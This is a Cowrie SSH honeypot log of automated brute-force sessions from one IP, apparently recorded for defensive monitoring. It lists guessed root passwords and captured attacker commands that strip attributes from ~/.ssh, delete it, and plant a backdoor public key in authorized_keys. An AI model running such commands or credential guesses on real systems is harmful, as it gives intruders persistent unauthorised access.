{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:24:59.295523Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.login.success","username":"root","password":"praneeth","message":"login attempt [root/praneeth] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:25:00.588585Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:25:01.274146Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.275013Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.276221Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58116,"dst_ip":"1.2.3.4","dst_port":22,"session":"51daf6be112f","protocol":"ssh","message":"New connection: 212.227.235.229:58116 (1.2.3.4:22) [session: 51daf6be112f]","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.278183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.278992Z","src_ip":"212.227.235.229","session":"51daf6be112f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.585591Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-09-08T22:25:01.632406Z","src_ip":"212.227.235.229","session":"51daf6be112f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:25:02.272249Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.273091Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.582182Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.583219Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.694770Z","src_ip":"212.227.235.229","session":"51daf6be112f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33180,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d3771ec381a","protocol":"ssh","message":"New connection: 212.227.235.229:33180 (1.2.3.4:22) [session: 0d3771ec381a]","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.892708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:02.893380Z","src_ip":"212.227.235.229","session":"0d3771ec381a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:03.205726Z","src_ip":"212.227.235.229","session":"0d3771ec381a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:25:04.494071Z","src_ip":"212.227.235.229","session":"0d3771ec381a"}
{"eventid":"cowrie.session.closed","duration":17.42862820625305,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:04.643941Z","src_ip":"212.227.235.229","session":"8b9a27c86a3f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:05.808028Z","src_ip":"212.227.235.229","session":"0d3771ec381a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33196,"dst_ip":"1.2.3.4","dst_port":22,"session":"e69bd437ab94","protocol":"ssh","message":"New connection: 212.227.235.229:33196 (1.2.3.4:22) [session: e69bd437ab94]","sensor":"my-vps","timestamp":"2025-09-08T22:25:06.114151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:06.115178Z","src_ip":"212.227.235.229","session":"e69bd437ab94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:06.423222Z","src_ip":"212.227.235.229","session":"e69bd437ab94"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:25:07.694904Z","src_ip":"212.227.235.229","session":"e69bd437ab94"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:08.004060Z","src_ip":"212.227.235.229","session":"e69bd437ab94"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:08.005280Z","src_ip":"212.227.235.229","session":"338920db8617"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47120,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d9a78533b96","protocol":"telnet","message":"New connection: 212.227.235.229:47120 (1.2.3.4:23) [session: 2d9a78533b96]","sensor":"my-vps","timestamp":"2025-09-08T22:25:10.269252Z"}
{"eventid":"cowrie.session.closed","duration":3.3493759632110596,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:13.618545Z","src_ip":"212.227.235.229","session":"2d9a78533b96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43840,"dst_ip":"1.2.3.4","dst_port":23,"session":"9aa5f3ba8fc3","protocol":"telnet","message":"New connection: 212.227.235.229:43840 (1.2.3.4:23) [session: 9aa5f3ba8fc3]","sensor":"my-vps","timestamp":"2025-09-08T22:25:17.389844Z"}
{"eventid":"cowrie.session.closed","duration":10.31832242012024,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:27.708092Z","src_ip":"212.227.235.229","session":"9aa5f3ba8fc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49746,"dst_ip":"1.2.3.4","dst_port":22,"session":"0364038a525a","protocol":"ssh","message":"New connection: 212.227.235.229:49746 (1.2.3.4:22) [session: 0364038a525a]","sensor":"my-vps","timestamp":"2025-09-08T22:25:27.961360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:27.961983Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:28.272142Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.login.success","username":"root","password":"Cc123456789","message":"login attempt [root/Cc123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:25:29.554484Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:25:30.238947Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:25:30.239704Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:25:30.241292Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:30.553402Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:25:31.188493Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.189337Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.501660Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.502615Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49748,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b0b501b53dc","protocol":"ssh","message":"New connection: 212.227.235.229:49748 (1.2.3.4:22) [session: 5b0b501b53dc]","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.685369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.686392Z","src_ip":"212.227.235.229","session":"5b0b501b53dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:31.931199Z","src_ip":"212.227.235.229","session":"5b0b501b53dc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:25:32.954468Z","src_ip":"212.227.235.229","session":"5b0b501b53dc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:34.201174Z","src_ip":"212.227.235.229","session":"5b0b501b53dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35812,"dst_ip":"1.2.3.4","dst_port":22,"session":"22cb7e8f1369","protocol":"ssh","message":"New connection: 212.227.235.229:35812 (1.2.3.4:22) [session: 22cb7e8f1369]","sensor":"my-vps","timestamp":"2025-09-08T22:25:34.572269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:34.572997Z","src_ip":"212.227.235.229","session":"22cb7e8f1369"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:25:34.882715Z","src_ip":"212.227.235.229","session":"22cb7e8f1369"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:25:36.160569Z","src_ip":"212.227.235.229","session":"22cb7e8f1369"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:36.471242Z","src_ip":"212.227.235.229","session":"0364038a525a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:25:36.472399Z","src_ip":"212.227.235.229","session":"22cb7e8f1369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55504,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4a7d0b66d4f","protocol":"ssh","message":"New connection: 212.227.235.229:55504 (1.2.3.4:22) [session: b4a7d0b66d4f]","sensor":"my-vps","timestamp":"2025-09-08T22:25:44.477441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:25:44.478333Z","src_ip":"212.227.235.229","session":"b4a7d0b66d4f"}
